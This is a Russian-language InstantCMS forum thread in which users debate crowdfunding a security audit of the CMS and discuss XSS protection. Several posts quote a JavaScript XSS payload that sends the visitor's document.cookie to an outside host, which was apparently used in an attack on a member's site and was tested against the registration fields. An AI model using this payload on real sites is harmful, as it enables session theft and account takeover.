Найти на сайте
  2. Форумы
  3. ФРИЛАНС-ФОРУМ
  4. Ищу исполнителя
  5. Безопасность движка, сбор средств, кто "за" ?

Безопасность движка, сбор средств, кто "за" ?

#16 16 августа 2012 в 20:55

А что входит в эти 50 т.р.?

malanas
Интересовались порядка 3х месяцев назад, уточню, напишу, если есть интерес.

Думаю, что вариант "сайт по безопасности с платным доступом" стоит внимания

lezginka.ru
Кто его сделает и будет вести? Мы не великие специалисты по безопасности и даже не столько в этом, сколько в том, что аудит безопасности кода — это очень и очень сложная работа, поверьте.
🛠 docs.instantcms.ru
0
#17 16 августа 2012 в 21:00
• Ɍɕβoṙη •, я бы на вашем месте не рисковал, приглашая вась.

А на продукте, есть очень хитрые лазейки)

Вася
Здесь все обновлено до тех патчей, о которых говорилось и выкладывались публично решения. О каком "продукте" идет речь?

p.s. Вася, сам удалишься или помочь?
🛠 docs.instantcms.ru
0
#18 16 августа 2012 в 21:15 
  1. <script>img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;</script>
При регистрации:
Максимальная длина = 15
Думаю нет смысла считать символы в первой строке и так на лицо переделка. Теперь гепатетически все же найдется 20-100 человек скинутся на спеца, где гарантия что один из заказчиков не захочет переделать под себя и тем самым не откроет брешь в защите.
Плюс, Лезгинка не обижайся, но все эти проделки школоты уже описаны в интернете и думаю кто то из спецов в каталоге может сделать зашиту от sql xss атак.
Группе, к которой вы принадлежите, запрещено просматривать этот скрытый текст
ИМХО трата на спеца, сперва нужно сформулировать чего хочешь, а что сказать ну вот шОб було уСё, так спецы народ конкретный, усё значит усе, тобишь переходи на двиг за 999 баксов, вот тогда мол дадим гарантии и то 90%
А вот насчет коллективного блога по защите согласен, а лучше клуб закрытый.

А вот что при вставке никнейма 
  1. img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;
тобишь обрезка джаваскрипта и ссылка не активна.
Если тебе роют яму - не мешай, закончат - сделаешь себе бассейн.
0
#19 16 августа 2012 в 21:18

Интересовались порядка 3х месяцев назад, уточню, напишу, если есть интерес.

Fuze
Если не трудно напишите…
0
#20 16 августа 2012 в 21:22

p.s. Вася, сам удалишься или помочь?

Fuze
у этого васи и у того кто взломал сайт lezginka.ru, аватар одинаков
Раньше РАЙ был везде - РАЙсовет, РАЙком, РАЙсобес...., а сейчас везде АДминистрации! Не надо давать людям советы. Каждый должен лохануться самостоятельно! Любишь в продакшн, люби и баги починить!
0
#21 16 августа 2012 в 21:24
Вася, привет, "старый" знакомый!
если религия позволяет, сними со своего профиля "Пользователь ограничил доступ к этой странице настройками безопасности."
просьба к модераторам, пока оставить "Васю", может чего толкового нам расскажет
0
#22 16 августа 2012 в 21:25
Готов за твои кровные 3000 стать хакером-тестером. Гарантий не даю))

P.S. по теме — можно конечно заказать аудит безопасности… но кто проконтроллирует работу?
0
#23 16 августа 2012 в 21:27

и думаю кто то из спецов в каталоге может сделать зашиту от sql xss атак.

Коля
не уверен.

сперва нужно сформулировать чего хочешь

Коля
Когда мы общались с специалистом, все было сформулировано и цена обозначена. Специалист надежный, знаем его давно.
За прошествием времени вылетело из головы, как возникнет возможность переговорить, напишу в этой теме.
🛠 docs.instantcms.ru
0
#24 16 августа 2012 в 21:27 


  1. img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;
При регистрации:
Максимальная длина = 15
Думаю нет смысла считать символы в первой строке и так на лицо переделка. Теперь гепатетически все же найдется 20-100 человек скинутся на спеца, где гарантия что один из заказчиков не захочет переделать под себя и тем самым не откроет брешь в защите.
Плюс, Лезгинка не обижайся, но все эти проделки школоты уже описаны в интернете и думаю кто то из спецов в каталоге может сделать зашиту от sql xss атак. Вот например описание XSS уязвимость и защита от XSS или вот Защита от XSS атак ИМХО трата на спеца, сперва нужно сформулировать чего хочешь, а что сказать ну вот шОб було уСё, так спецы народ конкретный, усё значит усе, тобишь переходи на двиг за 999 баксов, вот тогда мол дадим гарантии и то 90%
А вот насчет коллективного блога по защите согласен, а лучше клуб закрытый.

Коля
а почему бы просто не прогнать через strip_tags()?
0
#25 16 августа 2012 в 21:27

Мы не великие специалисты по безопасности и даже не столько в этом, сколько в том, что аудит безопасности кода — это очень и очень сложная работа, поверьте.

Fuze, для нашего случая, а это 99%, хватает уровня "стандартного" кодера, т.к. чайники часто допускают типичные ошибки
0
#26 16 августа 2012 в 21:29
Сама идея интересна, но я почему то более чем уверен, что если при анализе обнаружат "интересную" лазейку, то продадут эту инфу нескольким челам по 50к.р. на с нескольких посещаемых ресурсов эти деньги за месяц отобьются в умных руках разумеется) и умные будут рады выложить 50к за лазейку если она есть на массовой cms и на ней есть высоко посещаемые сайты, а такие есть...
Да и люди которые плотно занимаются поиском уязвимостей стопудово имеют знакомсва с "взломщиками".
Для меня здесь такая ситуация получается: хочется поверить что чел при анализе предоставит ВСЮ инфу, но не могу так как знаю какие деньги люди платят за получение этих уязвимостей...

Еще больше чем уверен что должен работать не один спец, а группа по методу мозгового штурма) иначе просто проверят на известные в обиходе дырки и этим все закончится — а группу с таким подходом работы нам не потянуть)

Лучше эти деньги разработчикам перечислить — скинуться и на новый год подарок финансовый сделать)
0
#27 16 августа 2012 в 21:29

Кто его сделает и будет вести?

тут стоит подумать.
что я думаю поэтому поводу изложу через часок, т.к. тороплюсь
0
#28 16 августа 2012 в 21:33
Если от аудита толк реальный будет и он действительно нужен, то надо хотя бы попытаться собрать сумму, а уж если не соберем тогда и говорить что не собрали...
Кто то 100 руб. Кто то 3000 руб. попытка не пытка (раздать обратно можно). Только сорганизоваться надо...

А то правда все на этой CMS ездим, а реально помочь не можем.
0
#29 16 августа 2012 в 21:33

а почему бы просто не прогнать через strip_tags()?

FreeLancer
Я вот все удивляюсь, что в код вообще никто на заглядывает!??
nickname прогоняется через strip_tags
в метод request() посмотрите уже.
🛠 docs.instantcms.ru
0
#30 16 августа 2012 в 21:35

а почему бы просто не прогнать через strip_tags()?

FreeLancer
Так по ходу наверно и прогоняется, я не спец, только попробовал на тестовом. Юзер регестрируется, но ссылка в профиле не активна. Вставлял вот это 
  1. <script>img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;</script>
Если вставить в логин пишет много букв, если в никнейм так обрезается <script> в начале и в конце.
Если тебе роют яму - не мешай, закончат - сделаешь себе бассейн.
0
нужно доработать компонент Кал
Вывод фотоальбомов из группы в
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.

Похожие темы

USERPAY + DONATE = Сбор средств на сайте

Ищу исполнителя Создана 4 года назад 9 сообщений

Добавление системы сбора пожертвований для НКО

Ищу исполнителя Создана 4 года назад 6 сообщений

Обновление движка, регистрация

Ищу исполнителя Создана 4 года назад 3 сообщения

[ЕСТЬ РЕШЕНИЕ] Биллинг. Вывод средств на яндекс.кошелек.

Биллинг Создана 3 года назад 8 сообщений

Вывод в списках контента с группировкой.

Инновации в системе Создана 2 года назад 5 сообщений

Как в Биллинге разделить бонусные начисления и реальные деньги?

Биллинг Создана 9 месяцев назад 30 сообщений

InstantCMS Team

Связь с нами
Email dev@instantcms.ru

Делаем полезные Интернет проекты с 2008 года 💫

О проекте

Поддержка

Дополнения

Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.